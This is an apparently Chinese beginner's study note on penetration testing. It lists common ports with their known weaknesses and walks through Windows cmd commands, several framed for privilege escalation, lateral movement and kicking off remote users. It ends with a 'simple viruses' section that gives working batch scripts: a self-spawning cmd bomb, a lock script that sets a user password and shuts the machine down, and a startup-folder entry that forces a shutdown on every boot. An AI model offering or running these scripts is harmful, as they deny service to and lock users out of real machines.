1.常见端口对应的服务

ftp 21

tenlnet 23

80 web

80-89可能是web

443 ssl心脏滴血漏洞以及一些web漏洞测试

445 smb

1433 mssql

1521 oracle

2082/2083 cpanel主机管理系统登陆(国外用的较多)

2222 da虚拟主机管理系统登陆(国外较多)

3128 squid代理默认端口-漫游内网

3306 mysql

3312/3311 kangle主机管理系统登陆

3389远程桌面

5432 postgreSQL-关系型数据库

5900 vnc (shodan 演示过了)

6379 redis(未授权)

7001,7002 weblogic 默认弱口令，反序列化

7778 kloxo 主机控制面板登录

8000-9090 一些常见的web端口，有些运维喜欢把管理后台开这些非80端口上面

8080 tomacat、wdcp主机管理系统，默认弱口令

8080,8089,9090 jboss

8083 vestacp 主机管理系统（国外较多）

8649 ganglia

8888 宝塔 主机管理默认端口

10000 virtuamin/webmin 服务器虚拟主机管理系统

11211 memcache 未授权访问

27017，27018 mongodb 未授权访问(shodan讲过)

28017 mongodb 统计系统页面

2.常用的cmd命令

重定向:是将命令的输入或输出从默认的标准输入（通常是键盘）或标准输出（通常是终端）转移到其他位置的一种操作。

1. echo

echo /?(查看echo的帮助提示)

echo 1(输出 1)

echo 1>1.txt (输出1 并重定向到1.txt文件)

echo 456789 >>1.txt(把内容追加到 1.txt文件)如果在用 它就会把文件覆盖掉中文意思就是输出的意思

2.dir(展示当前目录的文件)

3.d: c: 等和cd

(切换到d盘)

cd .(进入当前目录)

cd .. (回退到上一级目录)5C

cd /文件夹

cd desktop(切换到桌面)

4.tree(文件树状图)

tree /?(查看帮助文档)

tree /f (显示每个文件夹中的名称)

tree /a (使用ascll字符 ，而不使用扩展字符)

tree C:UserslAdministrator /f

tree C:UserslAdministrator /a

(在渗透测试中比较常用)

5.md创建目录和rd删除目录

md是mkdir 的缩写 (二者作用一致)

md kkk(在当前目录创建名为kkk的文件夹)

rd kkk(删除 kkk文件夹)

tab 补全功能 例如rd k (tab)就可以进行文件名补全

6.ipconfig(显示当前的网络状态 IP配置一般用这个命令查看网络本机IP地址，排查网络问题)

ipconfig /all(把所有本机的网络信息打印出来)

7.cls(清屏)

8.copy （复制拼接文件）

copy /?(查看帮助文档)

copy 1.txt..\1.txt(把文件1.txt复制到上一级目录)

先利用刚刚学的 cd..回退到上一级目录 再利用dir命令查看文件

copy 1.txt desktop\2.txt

(把admin文件夹中的1.txt复制到桌面并重命名为2.txt)

再说一个copy命令的使用方法 先echo 123 >1.txt 再echo456>2.txt 然后利用copy 命令 copy 1.txt+2.txt >3.txt(把1.txt的内容和2.txt的内容拼接起来 并重定向到3.txt并改名为3.txt)

9.move （文件移动）

move .. \1.txt 4.txt(把上一级目录中的1.txt移动到本级move目录并且重命名为4. txt)

(有人说 哎 刚刚copy也有这个操作 为啥不用copy，因为copy是复制原文件还存在，move是移动，移动了以后目录就不存在我们所移动的文件了)

10.ren(重命名)

ren 4.txt 5.txt(把4.txt重命名为5.txt)

11.del(删除)

del 1.txt 2.txt 3.txt(删除1.2.3.txt文件)

这个命令所删除的文件时永久删除的不会进入回收站

12.ping（一般用于探测主机ip是否存活）

ping \?(查看命令帮助文档)

ping  -t [服务器] (一直ping)

13.type （显示文本文件的内容）

首先用echo hello world >> 1.txt

type 1.txt(查看文件内容)

14.reg（注册表）

reg \?(查看帮助文档)

reg query [路径] （查看指定注册表项）

例如：

reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

reg add [路径] /v [值名称] /t [类型] /d [数据] /f （添加新的注册表项）

例如：

reg add HKEY_CURRENT_USER\Software\MyApp /v MyValue /t REG_SZ /d "Hello World" /f

reg edit [路径] /v [值名称] /d [新数据] /f （修改已有的注册表项）

例如：

reg add HKEY_CURRENT_USER\Software\MyApp /v MyValue /t REG_SZ /d "New Value" /f

reg delete [路径] /v [值名称] /f （删除指定的注册表项）

reg export [路径] [导出文件名] （导出整个注册表项或指定项）

reg import [导入文件名] （从文件导入注册表项）

reg query [路径] /s  （列出指定路径下的所有子项和键值）

15.nslookup (探测域名信息)

nslook www.baidu.com

nslook -d www.baidu.com （查看历史解析记录）

16.find（查找）

find /? 查看帮助文档

先在1.txt里面输入各种字符串，find "a" 1.txt (在·1.txt种查找带a的字段 )

find /n“a”1.txt(查找a参数的字段并排序行号)

type与find结合使用 使用 type 1.txt| find “a'(查看1.txt的内容并输出带有a参数的字段)

type 1.txtfind  "a" /n

(查看1.txt的内容并输出带有a参数的字段并排序行号)

17.tasklist （任务列表 显示出当前的进程名称等信息）

18.taskkill 了（杀死进程）

taskkill \? （查看帮助文档）

常用一般是-pid和-f -t

演示一下首先 calc(计算器) 开启一个进程

先用tasklist 查看进程 teskkill /pid 2824 杀死进程可以看见计算器以被杀死

假如遇见杀不掉的进程加一个 /f 参数即可

19.ver, winver(显示版本)

20.start(启动 开始命令)

例如 start cmd(打开cmd)

start calc (开启计算器)

start ping www.baidu.com -t(启动ping 并执行-t参数)

21.systeminfo (查看整个系统的信息)

查看一些比较重要的信息 比如说补丁信息，后期我们提权对是针对一些不同的修补程序进行一个提权，例如它少打了哪些补丁我们就利用少打的补丁进行提权。（溢出系统提权）

22.logoff (注销)

先logoff\?(查看帮助文档)

ogoff(注销，后期提权成功的情况下要远程登陆3389桌面的话，有可能有的机器是链接状态 我们可以利用这个命令把对方的远程登陆注销掉)

当然了这个比较暴力 也有不用这个命令也可以挤掉对方

23.shutdown(关机)/s /f /t /a /r /g /l

shutdown \? (查看帮助文档)

shutdown /s(关机)

shutdown /f(强制关机)

shutdown /t（设置时间，常与其他参数复用）

shutdown /a(计划取消)

shutdown /r(重启)

shutdown /g(重启并重新启动所有已经注册的应用程序)

shutdown /l（注销当前用户）

shutdown /i（显示关机对话框，可以通过图形界面选择关机或重启）

shutdown /r /t 0(/t设置时间 设置为0立即执行，此意为立即重启)

24.telnet （协议工具）

控制面板 -程序-打开或关闭Windows功能-telnet 客户端勾选

telnet(之前在shodan中 思科的设备就是基于这个)

25.arp  (自己ip和物理机的映射关系表表)

arp \?  (查看帮助文档)

arp -a(假设你以后拿到了一台内网机器你通过这条命令arp -a可以查看当前内网有哪些主机以助于横向移动，用于发现同一网络有哪些主机)

26.at (定时任务)

例如我要定时关机

at [时间] shutdown -s -t 0

ps:

at 23:30 shutdown -s -t 0

27.net(服务)

net stop telent （关闭telent）

net start telnet    （打开telnet）

net user  （看当前用户）

net user admin 123 /add (添加用户名admin 密码123的用户）

net user admin    (查看admin用户权限)

net user administrator（查看管理员用户权限）

怎么把admin变成管理员权限

net localgroup administrator admin /add(提权)

net user admin(查看admin用户权限)

net user admin /delete  （删除admin用户）

3.简单病毒

1.资源耗尽病毒

命令：

echo start cmd >1.txt

echo %0 >> 1.txt

ren 1.txt 1. bat

分析：第一句echo "start cmd" 字符串重定向到1.txt，就是把"start cmd" 内容输入到1.txt

第二句是吧%0追加到1.txt。 %0是特殊变量，表示当前执行的脚本名称或批处理文件

第三句是吧1.txt重命名为1.bat

运行结果：

2.锁机病毒

命令：

echo net user hjy 890890 > c:\windows\temp\1.bat

echo shutdown /s /t 0 >> c:\windows\temp\1.bat

分析：第一句是把"net user hjy 123123" 内容重定向到c盘/Windows/temp/1.bat（没有会新建）

   第二句是把"shutdown /s /t 0"追加到1.bat,并不会覆盖1.bat原先内容，会追加到文件的末尾处。

此代码本意是将用户名为hjy 密码为890890 然后执行关机。

执行结果：

3.无限重启病毒

命令：

echo shutdown /s /t 0 > c:\windows\temp\1.bat

copy c:\windows\temp\1.bat "%USERPROFILE%\Appdata\roaming\Microsoft\windows\start menu\programs\startup\"

分析：第一句是输出shutdown /s /t 0到1.bat里面。

第二句是复制1.bat到启动项的目录下，实现无限重启

执行结果：